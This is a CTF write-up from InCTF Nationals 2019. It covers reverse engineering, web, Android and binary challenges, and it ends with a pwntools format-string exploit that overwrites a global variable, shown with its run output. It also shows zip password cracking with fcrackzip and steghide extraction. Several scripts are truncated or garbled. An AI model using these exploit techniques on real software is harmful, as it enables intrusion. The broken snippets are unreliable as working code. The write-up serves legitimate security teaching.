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InCTF Nationals 2019


Reverse Engineering

Hoth 200 pts.

We are given a PE32 binary called fin.exe, but since we had to use the university computers (which had Ubuntu 16.04) I could only do a static analysis. Below is a snippet of the main function, after getting the user input the program calls _check function.

0x0040142d      call sym._scanf            
0x00401432      lea eax, dword [local_18h] 
0x00401436      mov dword [esp], eax
0x00401439      call sym._check

In the _check function there are a lot of mov instructions in the beginning.

0x00401473      c785b0feffff.  mov dword [local_150h], 0x82 ; 130
0x0040147d      c785b4feffff.  mov dword [local_14ch], 0x7b ; '{' ; 123
0x00401487      c785b8feffff.  mov dword [local_148h], 0x48 ; 'H' ; 72
0x00401491      c785bcfeffff.  mov dword [local_144h], 0x75 ; 'u' ; 117
0x0040149b      c785c0feffff.  mov dword [local_140h], 0x83 ; 131
0x004014a5      c785c4feffff.  mov dword [local_13ch], 0x70 ; 'p' ; 112
0x004014af      c785c8feffff.  mov dword [local_138h], 0x75 ; 'u' ; 117

Also there are a few operations being performed on the individuals bytes, before being compared to our input.

0x00401602      83e806         sub eax, 6
0x00401605      83f01e         xor eax, 0x1e
0x00401608      83c005         add eax, 5

So in order to reverse the operations, we need to subtract 5, xor 0x1e and add 6. So I extracted all the bytes that were being moved in the begin of the _check function and wrote this small python script to get the flag.

a = "\x82\x7B\x48\x75\x83\x70\x75\x81\x82\x78\x4C\x82\x78\x4C\x78\x82\x7E\x79\x7D\x46\x77\x4C\x75\x81\x4A\x7B\x4C\x72\x7C\x76\x4C\x75\x81\x82\x7B\x80\x6E"

for i in a:

Flag: inctf{this_is_simpler_than_you_think}

PartyPart 300 pts.

We are given a 64-bit ELF binary called Party_Part. The program takes our input then does a string compare. If the string is not 42 (0x2a) characters long, it exits.

0x0000000000000c9b <+99>:	mov    rdi,rax
0x0000000000000c9e <+102>:	call   0x6d0 
0x0000000000000ca3 <+107>:	cmp    rax,0x2a
0x0000000000000ca7 <+111>:	je     0xcbf 

For the rest of the program I used a decompiler. Below is the output after I have cleaned it up for better understanding. Although switch cases are easy to spot even in disassembly, during a CTF, it is always better to ease your burden therefore I took this approach.

puts("Enter Your lucky number!!");
scanf("%d", &num);

for (i=8; i; --i)
  switch (num)
    case 0:
      num = first(argv[1][num], num);
    case 6:
      num = second(argv[1][num], num);
    case 12:
      num = third(argv[1][num], num);
    case 18:
      num = fourth(argv[1][num], num);
    case 24:
      num = fifth(argv[1][num], num);
    case 30:
      num = sixth(argv[1][num], num);
    case 36:
      num = seventh(argv[1][num], num);
    case 42:
      return result;
    case 48:
      return result;
      return result;

We are asked to enter a number. Every case calls a function (named using ordinal conventions). The arguments passed are a pointer to a specific position (our number) in input string (which is passed using command line arguments) and our input number.

The switch case is especially curious since it is wrapped by a loop that runs eight times so it would seem we would hit the same case again and again.

int first (char \*a1, int a2) {
  for (i=0; i<6; ++i)
    temp[i+a2] = a1[i] ^ 8;
  if (strncmp(tem, "afk|ns<ea'pVvj5ar6ginTl&znev:xy~R=kRd7cb&z", a2 + 6))
    return 42;
  return 6;

The function performs a xor operation on the first six characters of our input string and compares it with the first six characters of: afk|ns<ea'pVvj5ar6ginTl&znev:xy~R=kRd7cb&z.

It returns 42 if the string mismatches else it returns 6. This makes the switch statement clearer. Case 42 calls loses() while case 6 calls second(). Other ordinal functions have similar structure, the only difference being the operation used before comparison.

So in total we have seven functions each working on the same string but performing different operations on different chunks (of six characters).

a = "afk|ns<ea'pVvj5ar6ginTl&znev:xy~R=kRd7cb&z"
b = []

b += [chr(ord(x)^8) for x in a][0:6]
b += [chr(ord(x)+9) for x in a][6:12]
b += [chr(ord(x)-2) for x in a][12:18]
b += [chr(ord(x)+0xb) for x in a][18:24]
b += [chr(ord(x)-6) for x in a][24:30]
b += [chr(ord(x)^0xd) for x in a][30:36]
b += [chr(ord(x)^7) for x in a][36:42]


Flag: inctf{Enj0y_th3_p4rty_w1th_p4rts_0f_c0de!}

Web Exploitation

Slender Ingress 300 pts.

I don't have the source for the web page, but there was a local file inclusion vulnerability. The home page had some hints towards what the parameter could have been (the keyword page was mentioned with emphasis), but since fuzzing parameters was not allowed, you could only rely on stumbling upon this fact. The /etc/passwd file had the flag. Payload:

Flag: inctf{you've_never_had_a_friend_like_me}

PHP Alert 200 pts.

Again, unfortunately I do not have the source for this, but the concepts required to win this challenge where mostly related to hash collisions and PHP loose comparison. More information can be found at spaze/hashes.



The Dilemma 100 pts.

We are given an encrypted zip file. At first I mistakenly used the compressed rockyou file :( to perform a dictionary attack, when it didn't work I gave up on the challenge. Later I saw that the challenge had many solves and realized my stupid mistake.

$ fcrackzip -D -p rockyou.txt -u 
PASSWORD FOUND!!!!: pw == trixie

From the zip file we extract two files: a JPG image and a text file containing "YodaMaster". Using steghide and the text file's contents as the password we get the flag.

$ steghide --extract -sf InCTF-Finals.jpg 
Enter passphrase: 
wrote extracted data to "flag.txt".

Flag: inctf{w0w_D0_Y0u_w4Nt_Th3_F0Rc3_t0_b3_w1Th_Y0u}

Mos Espa - Tatooine 400 pts.

In this challenge we get a PCAP file and after some analysis using wireshark we see that a client is sending some kind of a POST request to a server repeatedly with different querybytes "abcdef", below is the last request in the series.

Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.1
Cookie: PHPSESSID=so17hsr5sghdcecad042uno1fv
Content-Length: 18
Content-Type: application/x-www-form-urlencoded


In the end the server responds by saying `We've searched our database and there is no flag starting with abcdef`

So this gives us the hint that we need the querybyte parameter to represent the flag format prefix, i.e. inctf. After going to the website and trying it, we are able to do it, but at the end of it we get a timeout error. We are also slowed down by the fact that after every request, we get an auth-code which we have to enter in the next query request (as can be seen in the above request).

Because of the above restrictions I made a small script that allowed me to perform the actions faster to prevent a timeout. I could have fully automated it, but I wasn't very confident due to the time constraints so I used this ad-hoc solution.

import requests
url = ""

j = 1337
a = "inctf"

s = requests.Session()

for i in a:
    data = {"querybyte":i,"auth":j}
    r =,data)
    j = int(input())



Decode 200 pts.

We are given an APK file. I decompiled it using jadx.

jadx-gui Decode.apk

This is what the MainActivity looks like:

package com.r4hu1.decode;

import android.os.Bundle;
import android.util.Log;

public class MainActivity extends AppCompatActivity {
    /* access modifiers changed from: protected */
    public void onCreate(Bundle bundle) {
        setContentView((int) R.layout.activity_main);
        Log.d("Key", "Secret Key is : " + ("aW5jdGZ7bmV2M3Jfc3QwcmU=" + "X3MzbnMhdGl2M19kYXRh" + "XzFuXzdoM19zMHVyY2VjMGRlfQ=="));

We can see that there is some secret key logged in base64 format.

Flag: inctf{nev3r_st0re_s3ns!tiv3_data_1n_7h3_s0urcec0de}

Secret Service 200 pts.

We get an APK file. Using jadx-gui I saw that the app's package name was com.r4hu1.secretservice and it had an activity which printed the flag for us. The activity name was secretService. We can launch exported activities using the adb shell as follows:

$ adb shell
OnePlus3T:/ $ am start -n com.r4hu1.secretservice/.secretService
Starting: Intent { cmp=com.r4hu1.secretservice/.secretService }

Flag: inctf{exp0rted_activities_ar3_harmful}

Binary Exploitation


I solved this challenge after the CTF ended. We get a binary called chall. After decompiling it looked somewhat like this:


int Overwrite_Me = 0;

int main() {

  printf("Please enter your name : ");
  printf("Welcome Mr. ");

  if (Overwrite_Me == 0xcafe) {
    flag_file = fopen("flag","r");
    if (flag_file == (FILE *)0x0) {
      printf("Flag file not Found.\nContact the administrator.");
    else {
      char flag[50];
      fgets(flag, 50, flag_file);
      printf("You deserve this.\nHere, take you flag %s",flag);
  printf("Sorry it is not your day");

We see that this program requires us to change the value of Overwrite_Me to 0xcafe using the format string vulnerability on printf(name).

After analyzing the file with gdb I figured out that the buffer starts 20 offset from the first stack pop. Using that and the padding notation in format strings, I came up with the following exploit script:

from pwn import *
payload = p32(0x0804c040); #Overwrite_Me
payload += "%51961x.%20$n"
print payload
$ python | ./chall
Please enter your name : Welcome Mr.
You deserve this.
Here, take you flag inctf{this_is_a_dummy_flag}